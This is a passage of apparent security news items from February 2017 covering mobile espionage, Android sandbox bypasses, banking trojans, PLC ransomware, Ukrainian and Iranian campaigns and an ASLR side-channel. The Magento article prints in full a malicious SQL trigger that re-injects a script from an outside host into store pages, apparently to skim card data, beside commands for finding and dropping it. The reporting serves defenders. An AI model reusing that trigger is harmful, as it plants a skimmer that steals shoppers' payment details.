According to researchers, the hackers were able to successfully establish a widespread cyber espionage campaign by compromising dozens of mobile devices from Samsung, HTC, LG and Huawei belonging to over 100 Israeli soldiers.
Besides, almost 9,000 files stolen from compromised devices (roughly 97 percent) that were exfiltrated from compromised devices were identified by Lookout researchers as being highly encrypted images, which were taken using the device camera.
However, it's likely the IDF is not the only target.
The ViperRAT attack campaign started in July and continued to date, according to Kaspersky researchers.
Is Hamas Behind the Cyber-Spying Operation?
The IDF closely worked with Kaspersky Labs and Lookout to investigate this incident and theorized that Hamas was behind these attacks. However, Lookout researchers have come to doubt that theory.
According to Lookout researchers, "Based on tradecraft, the modular structure of code and use of cryptographic protocols [AES and RSA encryption] the actor appears to be quite sophisticated."
Researchers say Hamas is not known for sophisticated mobile capabilities, which makes it unlikely they are directly responsible for ViperRAT.
The IDF is currently working together with both Lookout and Kaspersky to identify infected targets and protect against further attacks, but there is one simple way to protect against ViperRAT: don't download apps from untrusted third-party sources.
Google Shares Data on Corporate Email Attacks
17.2.2017 securityweek Attack
A corporate email account is much more likely to receive malware, phishing and spam emails than a personal inbox, according to an analysis conducted by Google.
Google’s Gmail service has more than one billion active users and the company says it blocks hundreds of billions of attacks aimed at these accounts every week. At the RSA Conference this week, the search giant shared some insight on the threats targeting corporate inboxes and how the numbers compare to other types of accounts.
Data collected so far this year shows that a corporate email account is 4.3 times more likely to receive malware, 6.2 times more likely to receive a phishing email, and 0.4 times more likely to receive spam compared to personal inboxes.
While corporate accounts seem to be attackers’ favorite targets when it comes to spam and phishing, non-profit, education and government organizations are more likely to see malware attacks compared to businesses.
The entertainment, IT, and housing sectors are the most targeted in spam campaigns, but phishing attacks are more likely to be aimed at the finance and insurance sector. When it comes to malware attacks, real estate was by far the most targeted sector.
Sectors most targeted by malware in first part of 2017
The volume of phishing attempts depends on location – for instance, the financial sector in Japan receives a lot more phishing emails than in the United States and the United Kingdom. Google also noticed that the IT industry in Brazil sees roughly twice as many phishing attempts than in the U.S. and the U.K.
Japan and India are the countries with the most spammed inboxes, and the U.S., Germany and France are the largest spammers. In the first part of 2017, the highest percentage of phishing emails were sent to accounts in Japan, followed at a distance by Brazil, Canada and the United States.
Google’s experts pointed out that targets are selected based on several criteria, including size, type of organization, sector of activity, and location (country). That is why they believe defenses must be tailored based on each organization’s risk profile.
App-in-the-Middle Attacks Bypass Android Sandbox: Skycure
17.2.2017 securityweek Android
The Android sandbox environment previously known as Android for Work is susceptible to "app-in-the-middle attacks" that put enterprise data at risk, Skycure security researchers say.
The secure framework, currently referred to as “work features in Android,” is meant to address the BYOD (Bring Your Own Device) approach that brings millions of personal devices into business environments. Introduced in Android 5.0 Lollipop, the feature aims to separate business and personal data on the same device through the use of a second, business profile managed by IT administrators.
Having all of the business applications, email and documents managed and secured within the business profile but leaving the personal profile unrestricted would provide users a sense of increased privacy, because admins would not be able to manage or monitor their personal apps. The feature leverages the mechanism of user separation.
According to Skycure, while Android for Work was designed as an additional sandbox to prevent apps from outside the container from accessing data inside it, two ‘app-in-the-middle’ attacks allow malicious apps in the personal profile to break this wall. Thus, Android for Work is only a seemingly secure framework, and sensitive enterprise information can be accessed and stolen from the personal profile, they say.
The two attacks, however, prey on the weakest link in the security chain, namely the human factor. User interaction is required for both attacks to be successful, the researchers have discovered.
The first such attack, the security firm explains, relies on a malicious application in the personal profile acquiring permissions to view and take action on all notifications, including those from the sandboxed environment. Because Notifications access is a device-level permission, a malicious app would immediately have access to sensitive information such as calendar meetings, email messages and other information in these notifications.
“This capability circumvents the secure separation logic between personal and work profiles, which is offered by Android for Work. An app-in-the-middle attack may manipulate a user to enable the Notification Access permission (even for a legitimate function in the personal persona) in order to gain access to information in the work profile. If the malicious app is designed to transmit the information viewed in notifications to a command and control server, then the information contained in notifications is no longer secure,” Yair Amit, CTO & Co-Founder at Skycure, explains in a blog post.
The security company notes that an attacker could initiate a “forgot password” process on some enterprise systems and hijack the subsequent on-device notification, thus receiving full enterprise access, without being necessarily restrained to the mobile device. By immediately dismissing the notification and archiving the recovering email through the Android Notifications API, the malicious app could prevent the user from noticing the attack.
“This presents a serious threat to the use of Android for Work as a secure sandbox for mobile work productivity, as EMM [Enterprise Mobility Management] solutions have no mechanism to recognize or defend against it. The attacker may even capture 2-factor authentication and administrators will not have any visibility of the theft,” Amit says. The company also published a video to demonstrate this attack.
The second app-in-the-middle attack leverages Android’s Accessibility Service, which was designed to offer user interface enhancements when users interact with their device. Because this service has access to “virtually all content and controls, both reading and writing, on the device,” an application in the personal profile with Accessibility permissions could access applications executed in the sandbox, researchers say.
As detailed in this video demonstration, because the attack resides in the personal profile, which isn’t monitored or controlled from the work profile, IT administrators can’t detect the exposure of sensitive information if the malicious application uses the Accessibility Service, researchers say. However, for such an attack to be possible, an application would have to register as an Accessibility Service and manipulate the user to grant the access.
According to the security company, Android engineers have implemented an API for the whitelisting of Accessibility Services, which EMM vendors can implement in their Android for Work administration interfaces. This API, the company notes, can be circumvented either by a malicious app that has the same package name as a whitelisted legitimate app, or by an existing malicious app-in-the-middle Accessibility service that tricks the user into whitelisting it (because non-system Accessibility services already enabled on the device have to be whitelisted).
“The interesting thing about both of these app-in-the-middle methods of defeating the Android for Work profile separation is that the device and the Android operating system remain operating exactly as designed and intended. It is the user that must be tricked into placing the software on the device and activating the appropriate services that allow the malware access to sensitive information,” the security firm says.
Skycure notes that the Android team has been contacted on this matter but that their investigation determined that the aforementioned application behavior is intended, and not considered a security vulnerability. However, they agreed that the findings should be made public, “to raise awareness to the exposure.” The danger related to these issues, the company says, is the illusion of security that the sandbox offers.
“The attack flows that we uncovered exploit valuable capabilities of Android in a way that transforms these features into a major security risk to organizations that utilize Android for Work and expect it to stay secure. This is a user-experience vs. security tradeoff dilemma. We appreciate Google's commitment to security, but strongly believe that more work needs to be done in order to better protect organizations against App-in-the-Middle attacks,” Amit told SecurityWeek in an email.
Ursnif Banking Trojan's Distribution Networks Exposed
17.2.2017 securityweek Virus
Security researchers from Palo Alto Networks have managed to identify distribution networks used by the Ursnif banking Trojan to target various users worldwide.
The Ursnif Trojan is distributed via spam emails that contain malicious attachments meant to download the Ursnif executable from a remote site. While analyzing the threat, Palo Alto researchers discovered that there are two main components in the malware’s distribution network, namely a spam botnet to send malicious emails, and compromised web servers to host the malware.
The spam botnet, researchers say, is focused on delivering either banking Trojans or malware downloaders to vulnerable machines in Japan, Italy, Spain, Poland, Australia, and Germany. The compromised web servers, on the other hand, host banking Trojans and spam bot files that malicious downloaders distributed by spam would drop onto compromised machines.
Throughout 2016, millions of spam messages, the majority written in Japanese, were sent to users in Japan, with Shiotob (a.k.a Bebloh or URLZone) being the most widely distributed threat (75 unique variants identified in 7 million spam emails). Although capable of stealing banking information itself, the malware was used only for downloading a secondary payload (such as Ursnif), at least in the second half of the year, the researchers say.
“Unit 42 observed millions of spam emails attacking Japanese recipients, some of whom could be running the banking Trojan and spam bot simultaneously. Though it is difficult to know the exact numbers of infections by the email campaign, we know the number is significant considering an increase in Japan-based IP addresses as a source of emails with malicious attachment,” Palo Alto says.
An analysis of 200 unique Japanese IP addresses that were spamming Shiotob revealed 250 unique malware samples being sent among 268,000 emails in 2016. While most payloads were either banking Trojans or downloaders, researchers discovered that attackers were adapting to the country. Thus, Ursnif and Shiotob were delivered in Australia; KINS and Ursnif in Italy; Shiotob and Ursnif in Japan; Ursnif and Tinba in Spain and Poland; and Ursnif and KINS in Germany.
Attackers were found to have made their infrastructure redundant by copying the malicious files on multiple servers. The researchers discovered more than 200 such files on 74 servers used by the threat actors between April 2015 and January 2017. Most were compromised personal or small-to-medium-sized business websites in Europe, which haven’t been maintained for years.
A breakdown of the malware found on these web servers revealed that Ursnif represented around half of the samples. KINS, Pushdo, Rovnix, Andromeda, Shiotob, and Zeus were also among the identified malware families.
“The actors deploying these banking Trojans use a spam bot network and compromised web servers. It is still unclear whether a single group attacks multiple countries with various threats by using the infrastructures, or if numerous threat actors share them,” the researchers note
China-Linked Group Uses New Malware in Japan Attacks
17.2.2017 securityweek Virus
A China-linked threat actor has been using a new Trojan in attacks aimed at individuals and organizations located in or with ties to Japan, Palo Alto Networks reported on Thursday.
The group is known as menuPass, Stone Panda and APT10, and it has been active since at least 2009. The actor initially targeted defense contractors in the United States and elsewhere, and since 2014 it has also attacked organizations in Japan.
menuPass is known for using PlugX and PoisonIvy, which have been observed in campaigns launched by several actors. However, a recent menuPass operation, which took place between September and November 2016, involved a new Trojan, dubbed ChChes, that is unique to this group.
The recent operation targeted Japanese academics working in various scientific fields, a Japanese pharmaceutical company, and a US-based subsidiary of a Japanese manufacturing firm. The attacks started with spear-phishing emails that came from spoofed addresses, including of the Sasakawa Peace Foundation and the White House.
One clue that linked ChChes to other tools used by menuPass was a shared import hash. However, experts also discovered connections in the infrastructure used in the recent and older attacks.
ChChes was disguised as a Word document and it was signed using a certificate from Italian spyware maker Hacking Team. The certificate was leaked when the company was hacked in July 2015, but it had been revoked long before the latest menuPass attacks. Researchers believe attackers may have used it in an effort to make attribution more difficult.
In addition to collecting information about the infected system, ChChes has modules that help it encrypt communications, execute shell commands, upload and download files, and load and execute DLLs, according to an analysis conducted by Japan’s Computer Emergency Response Team Coordination Center (JPCERT/CC).
Palo Alto Networks believes ChChes is only used to download other malware onto infected computers, especially since it does not have a persistence mechanism.
“In a successful intrusion, it may be only a first stage tool used by the attackers to orient where they landed in a network, and other malware will be deployed as a second stage layering for persistence and additional access as the attackers move laterally through a network,” researchers said in a blog post.
Microsoft Calls for Cyber Geneva Convention
17.2.2017 securityweek Congress
Brad Smith Keynote at RSA Conference 2017
The modern digital world is as much characterized by nation-sponsored cyber-attacks as it is by criminal cyber-attacks – and Microsoft is calling for an international cyber Geneva Convention to protect business, users and critical infrastructure before it spirals out of control.
In a blog post this week, President and Chief Legal Officer Brad Smith describes The need for a Digital Geneva Convention “that will commit governments to protecting civilians from nation-state attacks in times of peace.” Within this model, he sees the tech industry as ‘a neutral Digital Switzerland’ occupying the role of the Red Cross. It is a popularized re-working of arguments presented By Scott Charney’s June 2016 paper, An organizing model for cybersecurity norms development.
Smith also spoke at this week's RSA Conference in San Francisco on the topic.
Smith believes that the time is right. “Just as the world’s governments came together in 1949 to adopt the Fourth Geneva Convention to protect civilians in times of war, we need a Digital Geneva Convention that will commit governments to implement the norms that have been developed to protect civilians on the internet in times of peace.”
Key to this idea will be an international adoption of norms; that is, shared expectations of appropriate behavior. Various organizations have been working on such norms. “UN GGE, G20, US-Sino bilateral agreement all have worked toward shaping the appropriate and mutually agreed-upon behavior in the digital domain,” explains Andrea Limbago, Chief Social Scientist at Endgame and formerly Senior Technical Lead at the Joint Warfare Analysis Center.
“Are we at the beginning of a sea change in what the international community decides is acceptable behavior?” asked Jeff Moss, founder of Black Hat and DEF CON in September, 2016. “It doesn’t have to be a treaty; it can just be a norm. The next administration is going to have to drive those norms of behavior.”
But Brad Smith goes to the next step. He is arguing for just such an international treaty loosely modelled on the Fourth Geneva Convention. Is such a treaty feasible? It would require the international adoption of norms of behavior, coupled with the ability to definitively attribute wrongdoing.
Norms
Smith explains that the norms underpinning his convention “should commit governments to avoiding cyber-attacks that target the private sector or critical infrastructure or the use of hacking to steal intellectual property. Similarly, it should require that governments assist private sector efforts to detect, contain, respond to and recover from these events, and should mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them.”
The first two elements are uncontroversial: governments should not attack other nations, and governments should assist the private sector in recovering from such attacks. The third, however, is difficult: it commits governments to effective cyber weapon disarmament.
The US/China bilateral agreement in late 2015 is cited as the green shoots of norms development. The two countries “made important progress in 2015 to ban intellectual property cyber-theft.” Noticeably, however, while commercial espionage was banned, political espionage was omitted. Smith’s norms, however, would effectively neutralize government agencies’ ability to hack and spy.
The US/China agreement ultimately led to several countries, including the US, voluntarily adopting ‘norms of state behavior in cyberspace’, explains Phil Quade, currently CISO at Fortinet but previously executive manager at the Department of Defense. “These norms,” he explains, “helped to establish guidelines like not stealing intellectual property for commercial gain, not attacking critical infrastructure, not using CERTs for offensive actions, and cooperating with government law enforcement in their cybercrime investigations.” But, he added, they are “designed to exclude government intelligence activities.”
“Nation states have invested too much time, attention and money into cyber warfare and espionage machines to turn back the dial,” warns Eric O’Neill, currently Carbon Black's National Security Strategist, but formerly a member of the FBI’s Special Surveillance Group. It is unlikely that governments will include themselves in the norms they might otherwise endorse.
Attribution
Accurate attribution is essential for the effective operation of norms. Without it, there would be nothing to stop individual nations flouting them with impunity. “Cyberespionage,” says O’Neill, “relies on the difficulty of attribution, anonymity, and ease of access from anywhere in the world. When the U.S. has caught Russia, North Korea, Iran and China spying, probing our critical infrastructure, attacking our business, and stealing our data, each country staunchly denied the acts.”
Put simply, irrefutable technical attribution is impossible. But based on accumulative intelligence – from SIGINT, field agents, geopolitical analysis and more – one nation’s intelligence community can definitively attribute attackers – but only to its own government. It will not reveal full information on its methods of attribution to foreign countries, leaving continuing room for doubt.
Smith’s, and indeed, Charney’s, solution is an independent international committee of experts. “In addition,” wrote Smith, “a Digital Geneva Convention needs to create an independent organization that spans the public and private sectors. Specifically, the world needs an independent organization that can investigate and share publicly the evidence that attributes nation-state attacks to specific countries.”
There are two problems here: firstly, can such an organization succeed in genuine attribution without full intelligence community cooperation; and secondly, will all nations accept that attribution? “I think the logistics that would need to be involved to somehow accurately monitor and identify who is doing what to who is nearly impossible,” comments Nathan Wenzler, chief security strategist at AsTech; “especially considering the ease in which a malicious actor can hide, obfuscate, redirect, bluff and otherwise mislead where they're performing attacks from. For an organization like this to be successful, accurate proof which all parties involved can agree is correct would be the key. But the very nature of technology today would make that difficult at best. And even if you can monitor all traffic accurately, there would still be difficulty in getting the political factions involved to agree with the findings.”
Cyber Geneva Convention
A cyber Geneva Convention (that is, the formalization of agreed norms and accurate attribution into a binding international treaty) seems unlikely. Even beyond attribution, how do you sanction nations that have flouted the norms? As Phil Quade comments, “Rogue governments tend not to pay much attention to ‘norms of behavior’.”
A treaty would require teeth. “Any plausible Cyber Geneva Convention would require agreement on sanctions for a nation member that violates the convention,” says O’Neill. “Because attribution is extraordinarily difficult, these penalties may lack teeth if the convention cannot enforce them.”
There are other problems. Quade again: “The norms are for a peacetime environment, yet the boundaries for what constitutes peacetime or wartime in cyberspace are rarely clear.”
There can be little doubt that the path to an international convention on norms of acceptable cyber behavior is difficult if not impossible.; yet it remains a dream worth pursuing. Andrea Limbago suggests the world is currently caught between the impossibility of a convention and the distinct need for one.
“In the near and even mid-term,” she said, “a digital Geneva Convention is neither feasible nor likely, but that does not detract from the necessity to pursue forums and agreements to shape those proper guardrails of behavior within the digital domain; that is, norms. Basically, there is an urgent need for working toward those same goals, while a Geneva Convention remains years, decades away if it will ever occur.”
She believes that the internet is at an inflection point, poised between what she describes as multi-stakeholder and cyber sovereignty. Keys to the former are global internet freedoms, a balance between security and privacy, social integration and an understanding of what is ‘off limits’.
The latter is complete economic, social and political government control of the internet within national boundaries. It is disguised as nationalism and typified by surveillance, censorship, propaganda and disinformation. And it is already happening in Russia, China, Iran and elsewhere. Even the United Kingdom can now be described as a surveillance state with the sweeping powers given to law enforcement and intelligence agencies via the Investigatory Powers Act.
The balkanization of the internet is already in progress. It will be a problem and a difficulty for individuals; but it could prove a disaster for the large international companies currently operating across national boundaries – such as Microsoft. Internationally agreed norms of acceptable cyber behavior ultimately leading to a cyber convention could maintain and improve the democratic nature of the multi-stakeholder global internet.
This Ransomware Malware Could Poison Your Water Supply If Not Paid
17.2.2017 thehackernews Virus
Ransomware has been around for a few years, but in last two years, it has become an albatross around everyone's neck, targeting businesses, hospitals, financial institutions and personal computers worldwide and extorting millions of dollars.
Ransomware is a type of malware that infects computers and encrypts their content with strong encryption algorithms, and then demands a ransom to decrypt that data.
It turned out to be a noxious game of Hackers to get paid effortlessly.
Initially, ransomware used to target regular internet users, but in past few months, we have already seen the threat targeting enterprises, educational facilities, and hospitals, hotels, and other businesses.
And now, the threat has gone Worse!
This PoC Ransomware Could Poison Water Supply!
Researchers at the Georgia Institute of Technology (GIT) have demonstrated the capability of ransomware to take down the critical infrastructure our cities need to operate, causing havoc among people.
GIT researchers created a proof-of-concept ransomware that, in a simulated environment, was able to gain control of a water treatment plant and threaten to shut off the entire water supply or poison the city's water by increasing the amount of chlorine in it.
Dubbed LogicLocker, the ransomware, presented at the 2017 RSA Conference in San Francisco, allowed researchers to alter Programmable Logic Controllers (PLCs) — the tiny computers that control critical Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) infrastructure, like power plants or water treatment facilities.
This, in turn, gave them the ability to shut valves, control the amount of chlorine in the water, and display false readouts.
Sounds scary, Right?
Fortunately, this has not happened yet, but researchers say this is only a matter of time.
The simulated attack by researchers was created to highlight how attackers could disrupt vital services which cater to our critical needs, like water management utilities, energy providers, escalator controllers, HVAC (heating, ventilation and air conditioning) systems, and other mechanical systems.
Over 1500 PLC Systems Open To Ransomware Attack
LogicLocker targets three types of PLCs that are exposed online and infects them to reprogram the tiny computer with a new password, locking the legitimate owners out and demanding ransom while holding the utility hostage.
If the owners pay, they get their control over the PLC back. But if not, the hackers could malfunction water plant, or worse, dump life-threatening amounts of chlorine in water supplies that could potentially poison entire cities.
GIT researchers searched the internet for the two models of PLCs that they targeted during their experiment and found more than 1,500 PLCs that were exposed online.
"There are common misconceptions about what is connected to the internet," says researcher David Formby. "Operators may believe their systems are air-gapped and that there's no way to access the controllers, but these systems are often connected in some way."
Targeting industrial control and SCADA systems is not new, cybercriminals and nation-state actors are doing this for years, with programs like Stuxnet, Flame, and Duqu, but ransomware will soon add a financial element to these type of cyber attacks.
Therefore, it is inevitable that money-motivated criminals will soon target critical infrastructure directly. Additionally, the nation-state actors could also hide their intentions under ransomware operators.
So, it is high time for industrial control systems and SCADA operators to start adopting standard security practices like changing the PLCs default passwords, limiting their connections by placing them behind a firewall, scanning their networks for potential threats, and install intrusion monitoring systems.
Insecure Android Apps Expose Connected Cars
17.2.2017 securityweek Hacking
Researchers at Kaspersky Lab have analyzed several Android applications for connected cars and determined that most of them lack important security features, making it easier for hackers to unlock the vehicles.
Carmakers often provide mobile applications that allow owners to control various functions remotely, including locking and unlocking doors, starting the engine, locating the vehicle, obtaining service information, and controlling air conditioning.
Kaspersky has analyzed seven of the most popular connected car Android applications, which have been installed by millions of users. The applications have not been named, but the security firm has reported its findings to their developers.
Researchers tested the apps to determine if they can be abused to steal a car or incapacitate its systems. They also looked for various security mechanisms, such as the use of obfuscation to prevent reverse engineering, checking if the device is rooted, checking the integrity of the code, and ensuring that the legitimate GUI is displayed to the user (i.e. overlay protection).
All the tested applications can be used to unlock a vehicle’s door and some of them also allow the user to start the engine. However, the aforementioned security features are mostly missing from the apps – only one encrypts the username and password, and none of them use obfuscation, overlay protection, root detection or code integrity checks.
The lack of security mechanisms makes it easier for a piece of malware that has infected the Android device to take control of the smart car app. And while hijacking the application does not allow an attacker to drive away with the car, it does allow them to unlock it and disable its alarm, which can make it easier to steal.
Researchers said car apps should be as secure as online banking apps, but they believe these applications currently represent the weakest link.
In November, researchers at Norway-based security firm Promon demonstrated how thieves with the necessary hacking skills can track and steal Tesla vehicles through the carmaker’s Android app. At the time, Tesla said the vulnerabilities exploited by the researchers were not specific to its products, and argued that once a smartphone is hacked, all the apps stored on it are compromised.
Kaspersky researchers agree, but they told SecurityWeek that certain security mechanisms can make exploitation more difficult, even if the attacker has root access to the device.
“If you store users' data in an encrypted storage (in addition to default Android secure storage which can be accessed by root-rights owner), if your app has a root-detection feature, if the code of the app is obfuscated and if it does a self-integrity check, it would be much-much harder for an attacker to break it and steal your users' private data or even get access to their cars' control,” the researchers said.
Many Ukrainian Organizations Targeted in Reconnaissance Operation
17.2.2017 securityweek Cyber
CyberX, a company that specializes in ICS security, has been monitoring a well-organized campaign that has targeted at least 70 entities with ties to Ukraine, including the country’s critical infrastructure.
The campaign, dubbed Operation BugDrop, has been underway since at least June 2016. It involves malware delivered via spear phishing emails and malicious macro-enabled Office documents.
The BugDrop malware is capable of collecting system information, passwords and other browser data, and audio from the microphone. It can also steal files from local, shared and USB drives, including documents, spreadsheets, presentations, archives, databases and text files.
Each of these capabilities is provided by a different module, but researchers determined that not all modules are deployed on every infected device. Based on its analysis, CyberX believes BugDrop is a reconnaissance operation and it could represent the first phase of a campaign with broader objectives.
The main module, which downloads the other components, is designed to upload the stolen data to a specified Dropbox account. Experts believe the malware uses Dropbox for exfiltration because the file sharing service is often not blocked or monitored by firewalls.
The malware also includes various anti-reverse engineering mechanisms, including checking for debuggers, virtual environments, WireShark and Process Explorer. The malware also attempts to evade detection by using encrypted DLLs and a technique called reflective DLL injection, which had also been leveraged by BlackEnergy and Duqu.
CyberX said a majority of the targets of Operation BugDrop are located or have an interest in Ukraine, but the attackers have also targeted entities in Russia, Saudi Arabia and Austria. Many of the Ukrainian organizations are located in the self-proclaimed states of Donetsk and Luhansk.
The list of victims includes an international organization that monitors human rights, counter-terrorism, and cyberattacks on critical infrastructure in Ukraine; a firm specializing in remote monitoring systems for oil and gas pipeline infrastructure; an energy company that designs gas pipelines, electrical substations, and water supply plants; a Ukrainian newspaper; and a scientific research institute.
“The operation requires a massive back-end infrastructure to store, decrypt and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics,” CyberX said in its report.
Based on its sophistication, CyberX believes the campaign is likely run by a state-sponsored actor, but the company has not named any country.
The security firm noted that there are many similarities to Operation Groundbait, a campaign detailed by ESET in May 2016. Operation Groundbait also targeted organizations in Ukraine and it also leveraged modular malware to steal data. ESET determined that it could be the work of a politically-motivated group from within Ukraine, which led the company to classify it as cyber surveillance.
However, CyberX believes Operation BugDrop is more sophisticated. For instance, Dropbox was not used for exfiltration in Operation Groundbait, and BugDrop used legitimate free web hosting to store its malware, as opposed to Groundbait attackers which paid for their domains and IP addresses.
Furthermore, the malware used in BugDrop was compiled one month after ESET published its report. Experts believe the two campaigns are either not related or the attackers decided to change their tactics, techniques and procedures after their activities were exposed.
A new SQL malware Targets online shops running on Magento
17.2.2017 securityaffairs Virus
Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database.
Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL.
The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.
The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape.
“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.
“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”
The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.
In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags).
echo 'SHOW TRIGGERS' | n98-magerun db:console
Once discovered the malicious trigger it is possible to delete it with a command like the following one:
echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console
According to the expert, SQL malware attacks starts with a brute force attack on
/rss/catalog/notifystock/
for an otherwise completely patched shop.
Below the pattern discovered by Jeroen Boersma:
TRIGGER `after_insert_order`
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
BEGIN
UPDATE core_config_data
SET value = IF(
value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
value,
CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
)
WHERE path='design/head/includes'
OR path='design/footer/absolute_footer'
OR path='design/footer/copyright';\
UPDATE cms_block
SET content= IF(
content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%',
content,
CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>')
);
END;
de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware.
Ukraine blames Russia for new cyber attacks on its infrastructure
17.2.2017 securityaffairs Attack
Ukraine blames Russia for a new wave of cyber attacks on its infrastructure, including the power grid and financial system.
This week Ukraine accused Russia of cyber attacks against its critical infrastructure, including power grid and financial systems. State-sponsored hackers used a new strain of malware that targets industrial processes, the malicious code looked like it was designed by the same threat actor behind the notorious BlackEnergy malware.
“Oleksandr Tkachuk, Ukraine’s security service chief of staff, said at a press conference that the attacks were orchestrated by the Russian security service with help from private software firms and criminal hackers, and looked like they were designed by the same people who created malware known as ‘BlackEnergy.'” reported the Reuters news Agency.
Tkachuk revealed that the malware used in the attacks was designed to attack specific industrial processes.
“As an example, he said that the code included modules that sought to harm equipment inside the electric grid.” reported the Reuters.
“Russian hackers and infobots become an important tool of the aggression against our country,” Tkachuk said.
The Russian Government has repeatedly denied accusations from the Ukrainian authorities that blames Moscow for cyber attacks against its infrastructure. The number of cyber attacks rapidly increased following the 2014 Crimean crisis.
According to the Ukrainian Government, Russian hackers launched 6,500 cyber attacks against its network in November and December alone. Kiev blamed Russian hackers for the power outage it has suffered in December. Hackers also targeted the defense and finance ministries and the State Treasury.
“There is a global cyber war of Russia against (the) whole world,” President Petro Poroshenko told Reuters in an interview in January at the World Economic Forum in Davos.
Tkachuk explained that the cyber attacks leverage the Telebots to infect computers that control infrastructure.
In December 2016, researchers from security firm ESET discovered that the BlackEnergy hacker group that targeted the Ukrainian grid one year ago, now identified as TeleBots, are targeting Ukrainian banks.
On Wednesday, cyber security experts at CyberX announced the discovery of a separate cyber espionage campaign in Ukraine that had compromised more than 60 victims, including an energy ministry, a scientific research institute and a firm that designs remote monitoring systems for oil & gas pipelines.
Iranian hackers behind the Magic Hound campaign linked to Shamoon
17.2.2017 securityaffairs CyberSpy
Security researchers discovered cyber espionage operation dubbed Magic Hound campaign that is linked to Iran and the recent Shamoon 2 attacks.
Security experts at Palo Alto Networks have discovered a new cyber espionage campaign linked to Iran that targeted several organizations in the Middle East.
The espionage campaign dubbed Magic Hound, dates back at least mid-2016. Hackers targeted organizations in the energy, government, and technology industries, all the targets are located or have an interest in Saudi Arabia.
The attackers leverage a wide range of custom tools and an open-source cross-platform remote access tool (RAT) dubbed Pupy for the Magic Hound campaign.
“According to the developer, PupyRAT is a “multi-platform (Windows, Linux, OSX, Android), multi-function RAT and post-exploitation tool mainly written in Python.” CTU™ analysis confirms that PupyRAT can give the threat actor full access to the victim’s system.” reads the analysis published by SecureWorks.
The arsenal of the threat actor includes different types of custom tools such as droppers, downloaders, executable loaders, document loaders and IRC bots.
“Unit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016 which we have named Magic Hound. This appears to be an attack campaign focused on espionage. Based upon our visibility it has primarily targeted organizations in the energy, government, and technology sectors that are either in in or business interests in Saudi Arabia.” reads the analysis published by PaloAlto Networks.
“Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “Rocket Kitten” (AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish) as well as an older attack campaign called Newscasters.”
The same campaign was also monitored by experts at SecureWorks that attributed it to a threat actor tracked as COBALT GYPSY that is associated with the Iranian government.
The attackers behind the Magic Hound used Word and Excel documents embedding malicious macros that were able to download and execute additional tools using PowerShell.
The bait files appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.
The malicious files appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.
An interesting discovery made by the experts is that some of the domains used in the Magic Hound campaign were also uncovered by IBM X-Force researchers in the analysis of the Shamoon 2 attack chain.
According to the experts at Palo Alto Networks an IRC bot used in the Magic Hound campaign is very similar to a piece of malware used by Newscaster, aka Charming Kitten and NewsBeef, an Iranian actor that targeted individuals in the U.S., Israel and other countries using fake social media profiles.
Iranian hackers appear very active in this period, both Charming Kitten and Rocket Kitten actors were mentioned in an analysis of MacDownloader used by to exfiltrate data from Mac computers.
A Simple JavaScript Exploit Bypasses ASLR Protection On 22 CPU Architectures
16.2.2017 thehackernews Attack
Security researchers have discovered a chip flaw that could nullify hacking protections for millions of devices regardless of their operating system or application running on them, and the worse — the flaw can not be entirely fixed with any mere software update.
The vulnerability resides in the way the memory management unit (MMU), a component of many CPUs, works and leads to bypass the Address Space Layout Randomization (ASLR) protection.
ASLR is a crucial security defense deployed by all modern operating systems from Windows and Linux to macOS, Android, and the BSDs.
In general, ASLR is a memory protection mechanism which randomizes the location where programs run in a device's memory. This, in turn, makes it difficult for attackers to execute malicious payloads in specific spots in memory when exploiting buffer overflows or similar bugs.
In short, for attackers, it's like an attempt to burglarize a house blindfolded.
But now a group of researchers, known as VUSec, from the Vrije University in the Netherlands have developed an attack that can bypass ASLR protection on at least 22 processor micro-architectures from popular vendors like Intel, AMD, ARM, Allwinner, Nvidia, and others.
The attack, dubbed ASLR Cache or AnC, is particularly serious because it uses simple JavaScript code to identify the base addresses in memory where system and application components are executed.
So, merely visiting a malicious site can trigger the attack, which allows attackers to conduct more attacks targeting the same area of the memory to steal sensitive information stored in the PC's memory.
Here's How the attack works:
The attack exploits the way microprocessors and memory interacts with each other.
MMU, which is present in desktop, mobile and server chips and tasks to map where a computer stores programs in its memory, constantly checks a directory called a page table to keep track of those addresses.
Devices usually store the page table in the CPU’s cache which makes the chip speedier and more efficient. But this component also shares some of its cache with untrusted applications, including browsers.
Therefore, a piece of javascript code running on a malicious website can also write to that cache (side channel attack), allowing attackers to discover where software components, like libraries and RAM-mapped files, are located in virtual memory.
With these location data in hands, any attacker can read portions of the computer's memory, which they could then use to launch more complex exploits, escalate access to the complete operating system, and hijack a computer system.
